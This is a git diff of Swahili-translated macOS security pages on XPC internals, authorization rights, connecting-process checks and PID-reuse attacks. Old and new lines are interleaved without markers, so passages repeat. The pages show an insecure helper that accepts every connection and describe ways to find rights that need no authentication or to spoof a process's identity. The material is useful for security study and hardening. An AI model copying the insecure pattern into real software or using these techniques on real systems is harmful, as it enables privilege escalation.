@ -111,7 +111,7 @@ Lengo ni kuanzisha kumbukumbu ya pamoja kati ya kazi za ndani na za mbali, kuifa
Kwa kufuata hatua hizi, kumbukumbu ya pamoja kati ya kazi za ndani na za mbali itakuwa imewekwa kwa ufanisi, ikiruhusu uhamasishaji wa data kwa urahisi na utekelezaji wa kazi zinazohitaji hoja nyingi.
## Vipande vya Kodi vya Ziada
## Nambari za Ziada
Kwa usambazaji wa kumbukumbu na uundaji wa kitu cha kumbukumbu ya pamoja:
```c
@ -127,12 +127,12 @@ Kumbuka kushughulikia maelezo ya Mach ports na majina ya kuingia kwenye kumbukum
## 5. Kufikia Udhibiti Kamili
Baada ya kufanikiwa kuanzisha kumbukumbu ya pamoja na kupata uwezo wa kutekeleza bila kikomo, tumepata udhibiti kamili juu ya mchakato wa lengo. Kazi muhimu zinazowezesha udhibiti huu ni:
Baada ya kufanikiwa kuanzisha kumbukumbu ya pamoja na kupata uwezo wa kutekeleza bila kikomo, kwa kweli tumepata udhibiti kamili juu ya mchakato wa lengo. Kazi muhimu zinazowezesha udhibiti huu ni:
1. **Operesheni za Kumbukumbu za Kijumla**:
- Fanya usomaji wa kumbukumbu za kijumla kwa kuita `memcpy()` ili nakala data kutoka eneo la pamoja.
- Fanya uandishi wa kumbukumbu za kijumla kwa kutumia `memcpy()` kuhamasisha data kwenye eneo la pamoja.
- Fanya usomaji wa kumbukumbu wa kijumla kwa kuita `memcpy()` ili kunakili data kutoka kwenye eneo la pamoja.
- Tekeleza uandishi wa kumbukumbu wa kijumla kwa kutumia `memcpy()` kuhamasisha data kwenye eneo la pamoja.
2. **Kushughulikia Kuitwa kwa Kazi zenye Hoja Nyingi**:

30
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
View File

@ -4,14 +4,14 @@
## Basic Information
XPC, ambayo inasimama kwa XNU (kernel inayotumiwa na macOS) mawasiliano kati ya Mchakato, ni mfumo wa **mawasiliano kati ya michakato** kwenye macOS na iOS. XPC inatoa mekanismu ya kufanya **kuitana kwa njia salama, zisizo za wakati mmoja kati ya michakato tofauti** kwenye mfumo. Ni sehemu ya mtindo wa usalama wa Apple, ikiruhusu **kuundwa kwa programu zenye ruhusa tofauti** ambapo kila **kipengele** kinakimbia na **ruhusa pekee zinazohitajika** kufanya kazi yake, hivyo kupunguza uharibifu unaoweza kutokea kutokana na mchakato ulioathirika.
XPC, ambayo inasimama kwa XNU (kernel inayotumiwa na macOS) mawasiliano kati ya Mchakato, ni mfumo wa **mawasiliano kati ya michakato** kwenye macOS na iOS. XPC inatoa mekanizma ya kufanya **kuitana kwa njia salama, zisizo za wakati mmoja kati ya michakato tofauti** kwenye mfumo. Ni sehemu ya mtindo wa usalama wa Apple, ikiruhusu **kuundwa kwa programu zenye kutenganishwa kwa ruhusa** ambapo kila **kipengele** kinakimbia na **ruhusa pekee inazohitaji** kufanya kazi yake, hivyo kupunguza uharibifu unaoweza kutokea kutokana na mchakato ulioathirika.
XPC inatumia aina ya Mawasiliano kati ya Mchakato (IPC), ambayo ni seti ya mbinu za programu tofauti zinazokimbia kwenye mfumo mmoja kutuma data kwa pande zote.
Faida kuu za XPC ni pamoja na:
1. **Usalama**: Kwa kutenganisha kazi katika michakato tofauti, kila mchakato unaweza kupewa ruhusa pekee zinazohitajika. Hii inamaanisha kwamba hata kama mchakato umeathirika, ina uwezo mdogo wa kufanya madhara.
2. **Utulivu**: XPC husaidia kutenga ajali kwenye kipengele ambapo zinatokea. Ikiwa mchakato utaanguka, unaweza kuanzishwa upya bila kuathiri mfumo mzima.
1. **Usalama**: Kwa kutenganisha kazi katika michakato tofauti, kila mchakato unaweza kupewa ruhusa pekee inazohitaji. Hii inamaanisha kwamba hata kama mchakato umeathirika, ina uwezo mdogo wa kufanya madhara.
2. **Utulivu**: XPC husaidia kutenga ajali kwenye kipengele ambapo zinatokea. Ikiwa mchakato unashindwa, unaweza kuanzishwa upya bila kuathiri mfumo mzima.
3. **Utendaji**: XPC inaruhusu urahisi wa ushirikiano, kwani kazi tofauti zinaweza kufanywa kwa wakati mmoja katika michakato tofauti.
Pungufu pekee ni kwamba **kutenganisha programu katika michakato kadhaa** na kuwafanya komunikate kupitia XPC ni **kasi kidogo**. Lakini katika mifumo ya leo hii haionekani sana na faida ni bora.
@ -22,7 +22,7 @@ Vipengele vya XPC vya programu viko **ndani ya programu yenyewe.** Kwa mfano, ka
Kama unavyofikiria, **kipengele cha XPC kitakuwa na ruhusa na haki tofauti** na vipengele vingine vya XPC au binary kuu ya programu. ISIPOKUWA huduma ya XPC imewekwa na [**JoinExistingSession**](https://developer.apple.com/documentation/bundleresources/information_property_list/xpcservice/joinexistingsession) kuwekwa kuwa “True” katika **faili yake ya Info.plist**. Katika kesi hii, huduma ya XPC itakimbia katika **sehemu sawa ya usalama kama programu** iliyoiita.
Huduma za XPC **zinanzishwa** na **launchd** inapohitajika na **zinazimwa** mara tu kazi zote **zinapokamilika** ili kuachilia rasilimali za mfumo. **Vipengele vya XPC vya programu vinaweza kutumiwa tu na programu**, hivyo kupunguza hatari inayohusiana na udhaifu unaoweza kutokea.
Huduma za XPC **zinanzishwa** na **launchd** inapohitajika na **zinazimwa** mara tu kazi zote **zinapokamilika** ili kuachilia rasilimali za mfumo. **Vipengele vya XPC vya programu vinaweza kutumika tu na programu**, hivyo kupunguza hatari inayohusiana na udhaifu unaoweza kutokea.
## System Wide XPC services
@ -72,7 +72,7 @@ Kila ujumbe wa XPC ni kitu cha kamusi ambacho kinarahisisha uhamasishaji na uham
Zaidi ya hayo, kazi `xpc_copy_description(object)` inaweza kutumika kupata uwakilishi wa maandiko wa kitu ambacho kinaweza kuwa na manufaa kwa madhumuni ya urekebishaji.\
Vitu hivi pia vina baadhi ya mbinu za kuita kama `xpc_<object>_copy`, `xpc_<object>_equal`, `xpc_<object>_hash`, `xpc_<object>_serialize`, `xpc_<object>_deserialize`...
`xpc_object_t` zinaundwa kwa kuita kazi `xpc_<objetType>_create`, ambayo kwa ndani inaita `_xpc_base_create(Class, Size)` ambapo inaonyeshwa aina ya darasa la kitu (moja ya `XPC_TYPE_*`) na ukubwa wake (baadhi ya 40B za ziada zitaongezwa kwenye ukubwa kwa metadata). Hii inamaanisha kuwa data ya kitu itaanza kwenye ofset 40B.\
`xpc_object_t` zinaundwa kwa kuita kazi `xpc_<objetType>_create`, ambayo ndani inaita `_xpc_base_create(Class, Size)` ambapo inaonyeshwa aina ya darasa la kitu (moja ya `XPC_TYPE_*`) na ukubwa wake (baadhi ya 40B za ziada zitaongezwa kwenye ukubwa kwa metadata). Hii inamaanisha kuwa data ya kitu itaanza kwenye ofset 40B.\
Hivyo, `xpc_<objectType>_t` ni aina ya darasa ndogo la `xpc_object_t` ambayo itakuwa darasa ndogo la `os_object_t*`.
> [!WARNING]
@ -94,12 +94,12 @@ Zaidi ya hayo, ni rahisi kurekebisha vitu hivi na DTrace kuliko zile za awali.
- **`GCD Queues`**
XPC inatumia GCD kupitisha ujumbe, zaidi ya hayo inazalisha foleni fulani za dispatch kama `xpc.transactionq`, `xpc.io`, `xpc-events.add-listenerq`, `xpc.service-instance`...
XPC inatumia GCD kupitisha ujumbe, zaidi inazalisha foleni fulani za dispatch kama `xpc.transactionq`, `xpc.io`, `xpc-events.add-listenerq`, `xpc.service-instance`...
## XPC Services
Hizi ni **bundles zenye kiendelezi `.xpc`** zilizoko ndani ya folda ya **`XPCServices`** ya miradi mingine na katika `Info.plist` zina `CFBundlePackageType` iliyowekwa kuwa **`XPC!`**.\
Hii faili ina funguo nyingine za usanidi kama `ServiceType` ambayo inaweza kuwa Programu, Mtumiaji, Mfumo au `_SandboxProfile` ambayo inaweza kufafanua sandbox au `_AllowedClients` ambayo inaweza kuashiria haki au ID inayohitajika kuwasiliana na seva. hizi na chaguzi nyingine za usanidi zitakuwa na manufaa kuunda huduma wakati inazinduliwa.
Hizi ni **bundles zenye kiendelezi `.xpc`** zilizoko ndani ya folda **`XPCServices`** za miradi mingine na katika `Info.plist` zina `CFBundlePackageType` iliyowekwa kuwa **`XPC!`**.\
Faili hii ina funguo nyingine za usanidi kama `ServiceType` ambayo inaweza kuwa Programu, Mtumiaji, Mfumo au `_SandboxProfile` ambayo inaweza kufafanua sandbox au `_AllowedClients` ambayo inaweza kuashiria haki au ID inayohitajika kuwasiliana na seva. hizi na chaguzi nyingine za usanidi zitakuwa na manufaa kuunda huduma wakati inazinduliwa.
### Kuanzisha Huduma
@ -111,16 +111,16 @@ Inawezekana kufuatilia vitendo vya `xpcproxy` kwa kutumia:
```bash
supraudit S -C -o /tmp/output /dev/auditpipe
```
Maktaba ya XPC inatumia `kdebug` kurekodi vitendo vinavyopiga simu `xpc_ktrace_pid0` na `xpc_ktrace_pid1`. Mifumo inayotumika haijaandikwa, hivyo inahitajika kuiongeza kwenye `/usr/share/misc/trace.codes`. Ina kiambishi `0x29` na kwa mfano moja ni `0x29000004`: `XPC_serializer_pack`.\
Maktaba ya XPC inatumia `kdebug` kurekodi vitendo vinavyopiga simu `xpc_ktrace_pid0` na `xpc_ktrace_pid1`. Mifumo inayotumika haijaandikwa, hivyo inahitajika kuiongeza kwenye `/usr/share/misc/trace.codes`. Zinatumia kiambishi `0x29` na kwa mfano moja ni `0x29000004`: `XPC_serializer_pack`.\
Kifaa `xpcproxy` kinatumia kiambishi `0x22`, kwa mfano: `0x2200001c: xpcproxy:will_do_preexec`.
## Ujumbe wa Tukio la XPC
## Ujumbe wa Matukio ya XPC
Programu zinaweza **kujiandikisha** kwa ujumbe tofauti wa **tukio**, na kuwapa uwezo wa **kuanzishwa kwa mahitaji** wakati matukio kama hayo yanapotokea. **Mpangilio** wa huduma hizi unafanywa katika **faili za plist za launchd**, zilizoko katika **directories sawa na zile za awali** na zinafunguo ya ziada **`LaunchEvent`**.
Programu zinaweza **kujiandikisha** kwa ujumbe tofauti wa matukio, na kuwapa uwezo wa **kuanzishwa kwa mahitaji** wakati matukio kama hayo yanapotokea. **Mpangilio** wa huduma hizi unafanywa katika **faili za plist za launchd**, zilizoko katika **directories sawa na zile za awali** na zinafungua **`LaunchEvent`** funguo ya ziada.
### Ukaguzi wa Mchakato wa Kuungana wa XPC
Wakati mchakato unajaribu kupiga simu njia kutoka kupitia muunganisho wa XPC, **huduma ya XPC inapaswa kukagua kama mchakato huo unaruhusiwa kuungana**. Hapa kuna njia za kawaida za kukagua hiyo na mtego wa kawaida:
Wakati mchakato unajaribu kupiga simu njia kupitia muunganisho wa XPC, **huduma ya XPC inapaswa kukagua kama mchakato huo unaruhusiwa kuungana**. Hapa kuna njia za kawaida za kukagua hiyo na mtego wa kawaida:
{{#ref}}
macos-xpc-connecting-process-check/
@ -128,7 +128,7 @@ macos-xpc-connecting-process-check/
## Uidhinishaji wa XPC
Apple pia inaruhusu programu **kuunda haki fulani na jinsi ya kuzipata** hivyo ikiwa mchakato unaopiga simu una hizo itaruhusiwa **kupiga simu njia** kutoka huduma ya XPC:
Apple pia inaruhusu programu **kuweka haki fulani na jinsi ya kuzipata** hivyo ikiwa mchakato unaopiga simu una hizo itaruhusiwa **kupiga simu njia** kutoka huduma ya XPC:
{{#ref}}
macos-xpc-authorization.md
@ -136,7 +136,7 @@ macos-xpc-authorization.md
## Sniffer ya XPC
Ili kunusa ujumbe za XPC unaweza kutumia [**xpcspy**](https://github.com/hot3eed/xpcspy) ambayo inatumia **Frida**.
Ili kunasa ujumbe wa XPC unaweza kutumia [**xpcspy**](https://github.com/hot3eed/xpcspy) ambayo inatumia **Frida**.
```bash
# Install
pip3 install xpcspy
@ -444,7 +444,7 @@ Huduma zinazounga mkono XPC ya mbali zitakuwa na katika plist yao ufunguo UsesRe
Zaidi ya hayo, `RemoteServiceDiscovery.framework` inaruhusu kupata taarifa kutoka kwa `com.apple.remoted.plugin` ikionyesha kazi kama `get_device`, `get_unique_device`, `connect`...
Mara tu `connect` inapotumika na socket `fd` ya huduma inakusanywa, inawezekana kutumia darasa la `remote_xpc_connection_*`.
Mara tu `connect` inapotumika na socket `fd` ya huduma inakusanywa, inawezekana kutumia darasa `remote_xpc_connection_*`.
Inawezekana kupata taarifa kuhusu huduma za mbali kwa kutumia zana ya cli `/usr/libexec/remotectl` kwa kutumia vigezo kama:
```bash

24
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
View File

@ -10,7 +10,7 @@ Wakati programu inahitaji **kutekeleza vitendo kama mtumiaji mwenye mamlaka**, b
### ShouldAcceptNewConnection kila wakati YES
Mfano unaweza kupatikana katika [EvenBetterAuthorizationSample](https://github.com/brenwell/EvenBetterAuthorizationSample). Katika `App/AppDelegate.m` inajaribu **kuunganisha** na **HelperTool**. Na katika `HelperTool/HelperTool.m` kazi **`shouldAcceptNewConnection`** **haitakagua** yoyote ya mahitaji yaliyoelezwa hapo awali. Itarudisha kila wakati YES:
Mfano unaweza kupatikana katika [EvenBetterAuthorizationSample](https://github.com/brenwell/EvenBetterAuthorizationSample). Katika `App/AppDelegate.m` inajaribu **kuunganisha** na **HelperTool**. Na katika `HelperTool/HelperTool.m` kazi **`shouldAcceptNewConnection`** **haitaangalia** yoyote ya mahitaji yaliyoelezwa hapo awali. Itarudisha kila wakati YES:
```objectivec
- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection
// Called by our XPC listener when a new connection comes in. We configure the connection
@ -27,7 +27,7 @@ newConnection.exportedObject = self;
return YES;
}
```
Kwa maelezo zaidi kuhusu jinsi ya kusanidi ipasavyo hii angalia:
Kwa maelezo zaidi kuhusu jinsi ya kusanidi hii ipasavyo angalia:
{{#ref}}
macos-xpc-connecting-process-check/
@ -172,11 +172,11 @@ block(authRightName, authRightDefault, authRightDesc);
}];
}
```
Hii inamaanisha kwamba mwishoni mwa mchakato huu, ruhusa zilizotangazwa ndani ya `commandInfo` zitawekwa katika `/var/db/auth.db`. Angalia jinsi kuna **kila njia** ambayo itahitaji **uthibitisho**, **jina la ruhusa** na **`kCommandKeyAuthRightDefault`**. Ya mwisho **inaonyesha ni nani anaweza kupata haki hii**.
Hii inamaanisha kwamba mwishoni mwa mchakato huu, ruhusa zilizotangazwa ndani ya `commandInfo` zitawekwa katika `/var/db/auth.db`. Angalia jinsi kuna unaweza kupata kwa **kila njia** ambayo itahitaji **uthibitisho**, **jina la ruhusa** na **`kCommandKeyAuthRightDefault`**. Ya mwisho **inaonyesha ni nani anaweza kupata haki hii**.
Kuna maeneo tofauti kuonyesha ni nani anaweza kufikia haki. Baadhi yao zimefafanuliwa katika [AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity_authorization/lib/AuthorizationDB.h) (unaweza kupata [zote hapa](https://www.dssw.co.uk/reference/authorization-rights/)), lakini kwa muhtasari:
Kuna maeneo tofauti kuonyesha ni nani anaweza kufikia haki. Baadhi yao zimetajwa katika [AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity_authorization/lib/AuthorizationDB.h) (unaweza kupata [zote hapa](https://www.dssw.co.uk/reference/authorization-rights/)), lakini kwa muhtasari:
<table><thead><tr><th width="284.3333333333333">Jina</th><th width="165">Thamani</th><th>Maelezo</th></tr></thead><tbody><tr><td>kAuthorizationRuleClassAllow</td><td>ruhusu</td><td>Mtu yeyote</td></tr><tr><td>kAuthorizationRuleClassDeny</td><td>kata</td><td>Hakuna mtu</td></tr><tr><td>kAuthorizationRuleIsAdmin</td><td>ni-admin</td><td>Mtumiaji wa sasa anahitaji kuwa admin (ndani ya kundi la admin)</td></tr><tr><td>kAuthorizationRuleAuthenticateAsSessionUser</td><td>authenticate-session-owner</td><td>Muulize mtumiaji kuthibitisha.</td></tr><tr><td>kAuthorizationRuleAuthenticateAsAdmin</td><td>authenticate-admin</td><td>Muulize mtumiaji kuthibitisha. Anahitaji kuwa admin (ndani ya kundi la admin)</td></tr><tr><td>kAuthorizationRightRule</td><td>kanuni</td><td>Fafanua sheria</td></tr><tr><td>kAuthorizationComment</td><td>maoni</td><td>Fafanua maoni ya ziada juu ya haki</td></tr></tbody></table>
<table><thead><tr><th width="284.3333333333333">Jina</th><th width="165">Thamani</th><th>Maelezo</th></tr></thead><tbody><tr><td>kAuthorizationRuleClassAllow</td><td>ruhusu</td><td>Mtu yeyote</td></tr><tr><td>kAuthorizationRuleClassDeny</td><td>kata</td><td>Hakuna mtu</td></tr><tr><td>kAuthorizationRuleIsAdmin</td><td>ni-admin</td><td>Mtumiaji wa sasa anahitaji kuwa admin (ndani ya kundi la admin)</td></tr><tr><td>kAuthorizationRuleAuthenticateAsSessionUser</td><td>authenticate-session-owner</td><td>Muulize mtumiaji kuthibitisha.</td></tr><tr><td>kAuthorizationRuleAuthenticateAsAdmin</td><td>authenticate-admin</td><td>Muulize mtumiaji kuthibitisha. Anahitaji kuwa admin (ndani ya kundi la admin)</td></tr><tr><td>kAuthorizationRightRule</td><td>kanuni</td><td>Eleza sheria</td></tr><tr><td>kAuthorizationComment</td><td>maoni</td><td>Eleza maoni ya ziada kuhusu haki</td></tr></tbody></table>
### Uthibitishaji wa Haki
@ -228,7 +228,7 @@ assert(junk == errAuthorizationSuccess);
return error;
}
```
Kumbuka kwamba ili **kuangalia mahitaji ya kupata** haki ya kuita njia hiyo, kazi `authorizationRightForCommand` itakagua tu kitu cha maoni kilichotajwa awali **`commandInfo`**. Kisha, itaita **`AuthorizationCopyRights`** kuangalia **kama ina haki** ya kuita kazi hiyo (kumbuka kwamba bendera zinaruhusu mwingiliano na mtumiaji).
Kumbuka kwamba ili **kuangalia mahitaji ya kupata** haki ya kuita ile njia, kazi `authorizationRightForCommand` itakagua tu kitu cha maoni kilichotajwa awali **`commandInfo`**. Kisha, itaita **`AuthorizationCopyRights`** kuangalia **kama ina haki** ya kuita kazi hiyo (kumbuka kwamba bendera zinaruhusu mwingiliano na mtumiaji).
Katika kesi hii, ili kuita kazi `readLicenseKeyAuthorization`, `kCommandKeyAuthRightDefault` imewekwa kuwa `@kAuthorizationRuleClassAllow`. Hivyo **mtu yeyote anaweza kuita**.
@ -249,14 +249,14 @@ security authorizationdb read com.apple.safaridriver.allow
Unaweza kupata **mipangilio yote ya ruhusa** [**hapa**](https://www.dssw.co.uk/reference/authorization-rights/), lakini mchanganyiko ambao hautahitaji mwingiliano wa mtumiaji ungekuwa:
1. **'authenticate-user': 'false'**
- Hii ni funguo ya moja kwa moja zaidi. Ikiwa imewekwa kuwa `false`, inaashiria kwamba mtumiaji hatahitaji kutoa uthibitisho ili kupata haki hii.
- Hii ndiyo funguo ya moja kwa moja zaidi. Ikiwa imewekwa kuwa `false`, inaashiria kwamba mtumiaji hatahitaji kutoa uthibitisho ili kupata haki hii.
- Hii inatumika kwa **mchanganyiko na moja ya 2 hapa chini au kuashiria kundi** ambalo mtumiaji lazima awe sehemu yake.
2. **'allow-root': 'true'**
- Ikiwa mtumiaji anafanya kazi kama mtumiaji wa root (ambaye ana ruhusa za juu), na funguo hii imewekwa kuwa `true`, mtumiaji wa root anaweza kupata haki hii bila uthibitisho zaidi. Hata hivyo, kwa kawaida, kufikia hadhi ya mtumiaji wa root tayari kunahitaji uthibitisho, hivyo hii si hali ya "hakuna uthibitisho" kwa watumiaji wengi.
3. **'session-owner': 'true'**
- Ikiwa imewekwa kuwa `true`, mmiliki wa kikao (mtumiaji aliyeingia sasa) atapata haki hii moja kwa moja. Hii inaweza kupita uthibitisho wa ziada ikiwa mtumiaji tayari ameingia.
4. **'shared': 'true'**
- Funguo hii haitoi haki bila uthibitisho. Badala yake, ikiwa imewekwa kuwa `true`, inamaanisha kwamba mara haki hiyo itakapothibitishwa, inaweza kushirikiwa kati ya michakato mingi bila kila mmoja kuhitaji kuthibitishwa tena. Lakini utoaji wa awali wa haki hiyo bado unahitaji uthibitisho isipokuwa ikichanganywa na funguo nyingine kama `'authenticate-user': 'false'`.
- Funguo hii haitoi haki bila uthibitisho. Badala yake, ikiwa imewekwa kuwa `true`, inamaanisha kwamba mara haki hiyo itakapothibitishwa, inaweza kushirikiwa kati ya michakato mingi bila kila mmoja kuhitaji kuthibitishwa tena. Lakini utoaji wa awali wa haki hiyo bado utahitaji uthibitisho isipokuwa ikichanganywa na funguo nyingine kama `'authenticate-user': 'false'`.
Unaweza [**kutumia skripti hii**](https://gist.github.com/carlospolop/96ecb9e385a4667b9e40b24e878652f9) kupata haki za kuvutia:
```bash
@ -269,17 +269,17 @@ com-apple-aosnotification-findmymac-remove, com-apple-diskmanagement-reservekek,
Rights with 'session-owner': 'true':
authenticate-session-owner, authenticate-session-owner-or-admin, authenticate-session-user, com-apple-safari-allow-apple-events-to-run-javascript, com-apple-safari-allow-javascript-in-smart-search-field, com-apple-safari-allow-unsigned-app-extensions, com-apple-safari-install-ephemeral-extensions, com-apple-safari-show-credit-card-numbers, com-apple-safari-show-passwords, com-apple-icloud-passwordreset, com-apple-icloud-passwordreset, is-session-owner, system-identity-write-self, use-login-window-ui
```
## Kurejesha Idhini
## Kurejesha Mamlaka
### Kuangalia kama EvenBetterAuthorization inatumika
Ikiwa unapata kazi: **`[HelperTool checkAuthorization:command:]`** inawezekana mchakato unatumia mpangilio ulioelezwa hapo awali kwa ajili ya idhini:
Ikiwa unapata kazi: **`[HelperTool checkAuthorization:command:]`** inawezekana kwamba mchakato unatumia mpangilio ulioelezwa hapo awali kwa ajili ya mamlaka:
<figure><img src="../../../../../images/image (42).png" alt=""><figcaption></figcaption></figure>
Hii, ikiwa kazi hii inaita kazi kama `AuthorizationCreateFromExternalForm`, `authorizationRightForCommand`, `AuthorizationCopyRights`, `AuhtorizationFree`, inatumia [**EvenBetterAuthorizationSample**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L101-L154).
Angalia **`/var/db/auth.db`** kuona kama inawezekana kupata ruhusa za kuita hatua fulani yenye mamlaka bila mwingiliano wa mtumiaji.
Angalia **`/var/db/auth.db`** ili kuona kama inawezekana kupata ruhusa za kuita hatua fulani za mamlaka bila mwingiliano wa mtumiaji.
### Mawasiliano ya Itifaki
@ -291,7 +291,7 @@ Kazi **`shouldAcceptNewConnection`** inaonyesha itifaki inayotolewa:
Katika kesi hii, tuna sawa na katika EvenBetterAuthorizationSample, [**angalia mstari huu**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L94).
Kujua, jina la itifaki inayotumika, inawezekana **kudondosha ufafanuzi wa kichwa chake** na:
Kujua, jina la itifaki inayotumika, inawezekana **kudondosha ufafanuzi wa kichwa chake** kwa:
```bash
class-dump /Library/PrivilegedHelperTools/com.example.HelperTool

34
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
View File

@ -1,30 +1,30 @@
# macOS XPC Kuangalia Mchakato wa Kuunganisha
# macOS XPC Connecting Process Check
{{#include ../../../../../../banners/hacktricks-training.md}}
## XPC Kuangalia Mchakato wa Kuunganisha
## XPC Connecting Process Check
Wakati muunganisho unapoanzishwa na huduma ya XPC, seva itakagua ikiwa muunganisho unaruhusiwa. Hizi ndizo ukaguzi ambao kawaida hufanywa:
1. Angalia ikiwa **mchakato unaounganisha umeandikwa na cheti kilichosainiwa na Apple** (ambacho kinatolewa tu na Apple).
1. Angalia ikiwa **mchakato unaounganisha umewekwa saini na cheti kilichosainiwa na Apple** (ambacho kinatolewa tu na Apple).
- Ikiwa hii **haihakikishwi**, mshambuliaji anaweza kuunda **cheti bandia** ili kufanana na ukaguzi mwingine wowote.
2. Angalia ikiwa mchakato unaounganisha umeandikwa na **cheti cha shirika**, (uthibitisho wa kitambulisho cha timu).
- Ikiwa hii **haihakikishwi**, **cheti chochote cha mende** kutoka Apple kinaweza kutumika kwa kusaini, na kuungana na huduma.
3. Angalia ikiwa mchakato unaounganisha **una kitambulisho sahihi cha bundle**.
2. Angalia ikiwa mchakato unaounganisha umewekwa saini na **cheti cha shirika**, (uthibitisho wa kitambulisho cha timu).
- Ikiwa hii **haihakikishwi**, **cheti chochote cha mende** kutoka Apple kinaweza kutumika kwa ajili ya saini, na kuungana na huduma.
3. Angalia ikiwa mchakato unaounganisha **una kitambulisho sahihi cha kifurushi**.
- Ikiwa hii **haihakikishwi**, chombo chochote **kilichosainiwa na shirika hilo hilo** kinaweza kutumika kuingiliana na huduma ya XPC.
4. (4 au 5) Angalia ikiwa mchakato unaounganisha una **nambari sahihi ya toleo la programu**.
- Ikiwa hii **haihakikishwi,** wateja wa zamani, wasio salama, walio hatarini kwa sindano ya mchakato wanaweza kutumika kuungana na huduma ya XPC hata na ukaguzi mwingine ukiwa mahali.
5. (4 au 5) Angalia ikiwa mchakato unaounganisha una runtime iliyoharden bila ruhusa hatari (kama zile zinazoruhusu kupakia maktaba zisizo na mipaka au kutumia DYLD env vars)
1. Ikiwa hii **haihakikishwi,** mteja anaweza kuwa **hatari kwa sindano ya msimbo**
- Ikiwa hii **haihakikishwi**, wateja wa zamani, wasio salama, walio hatarini kwa sindano ya mchakato wanaweza kutumika kuungana na huduma ya XPC hata na ukaguzi mwingine ukiwa mahali.
5. (4 au 5) Angalia ikiwa mchakato unaounganisha una **runtime iliyoharden bila ruhusa hatari** (kama zile zinazoruhusu kupakia maktaba zisizo za kawaida au kutumia DYLD env vars)
1. Ikiwa hii **haihakikishwi**, mteja anaweza kuwa **hatari kwa sindano ya msimbo**
6. Angalia ikiwa mchakato unaounganisha una **ruhusa** inayoruhusu kuungana na huduma. Hii inatumika kwa binaries za Apple.
7. **Uthibitisho** lazima uwe **kulingana** na **tokeni ya ukaguzi ya mteja** **badala** ya kitambulisho chake cha mchakato (**PID**) kwani ya kwanza inazuia **shambulio la upya PID**.
- Wandevu **hawatumii mara kwa mara API ya tokeni ya ukaguzi** kwani ni **binafsi**, hivyo Apple inaweza **kubadilisha** wakati wowote. Zaidi ya hayo, matumizi ya API binafsi hayaruhusiwi katika programu za Mac App Store.
7. **Uthibitisho** lazima uwe **kulingana** na **tokeni ya ukaguzi ya mteja** **badala** ya kitambulisho chake cha mchakato (**PID**) kwani ya kwanza inazuia **shambulio la upya wa PID**.
- Wandevu **hawatumii mara kwa mara API ya tokeni ya ukaguzi** kwani ni **binafsi**, hivyo Apple inaweza **kubadilisha** wakati wowote. Aidha, matumizi ya API binafsi hayaruhusiwi katika programu za Mac App Store.
- Ikiwa njia **`processIdentifier`** inatumika, inaweza kuwa hatarini
- **`xpc_dictionary_get_audit_token`** inapaswa kutumika badala ya **`xpc_connection_get_audit_token`**, kwani ya mwisho inaweza pia kuwa [hatari katika hali fulani](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/).
### Mashambulizi ya Mawasiliano
### Communication Attacks
Kwa maelezo zaidi kuhusu shambulio la upya PID angalia:
Kwa maelezo zaidi kuhusu shambulio la upya wa PID angalia:
{{#ref}}
macos-pid-reuse.md
@ -36,11 +36,11 @@ Kwa maelezo zaidi kuhusu shambulio la **`xpc_connection_get_audit_token`** angal
macos-xpc_connection_get_audit_token-attack.md
{{#endref}}
### Trustcache - Kuzuia Mashambulizi ya Kudunisha
### Trustcache - Downgrade Attacks Prevention
Trustcache ni njia ya kujihami iliyowekwa katika mashine za Apple Silicon ambayo inahifadhi hifadhidata ya CDHSAH ya binaries za Apple ili tu binaries zisizobadilishwa zinazoruhusiwa ziweze kutekelezwa. Hii inazuia utekelezaji wa toleo la kudunisha.
Trustcache ni njia ya kujihami iliyowekwa katika mashine za Apple Silicon ambayo inahifadhi hifadhidata ya CDHSAH ya binaries za Apple ili tu binaries zisizobadilishwa zinazoruhusiwa ziweze kutekelezwa. Hii inazuia utekelezaji wa toleo la chini.
### Mifano ya Msimbo
### Code Examples
Seva itatekeleza **uthibitisho** huu katika kazi inayoitwa **`shouldAcceptNewConnection`**.
```objectivec
@ -49,7 +49,7 @@ Seva itatekeleza **uthibitisho** huu katika kazi inayoitwa **`shouldAcceptNewCon
return YES;
}
```
Obiect NSXPCConnection ina mali **ya faragha** **`auditToken`** (ile ambayo inapaswa kutumika lakini inaweza kubadilika) na mali **ya umma** **`processIdentifier`** (ile ambayo haipaswi kutumika).
Objekti NSXPCConnection ina mali **ya faragha** **`auditToken`** (ile inapaswa kutumika lakini inaweza kubadilika) na mali **ya umma** **`processIdentifier`** (ile isiyopaswa kutumika).
Mchakato unaounganisha unaweza kuthibitishwa kwa kitu kama:
```objectivec

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
View File

@ -6,18 +6,18 @@
Wakati huduma ya macOS **XPC** inakagua mchakato ulioitwa kulingana na **PID** na si kwa **audit token**, inakuwa hatarini kwa shambulio la PID reuse. Shambulio hili linategemea **race condition** ambapo **exploit** itatumia **kutuma ujumbe kwa huduma ya XPC** **ikikandamiza** kazi hiyo na kisha **baada** ya hapo, inatekeleza **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** na **binary** iliyo **ruhusiwa**.
Kazi hii itafanya **binary iliyo ruhusiwa kuwa na PID** lakini **ujumbe mbaya wa XPC utakuwa umetumwa** kabla tu. Hivyo, ikiwa huduma ya **XPC** **itatumia** **PID** kuthibitisha mtumaji na kuangalia **BAADA** ya utekelezaji wa **`posix_spawn`**, itadhani inatoka kwa mchakato **uliothibitishwa**.
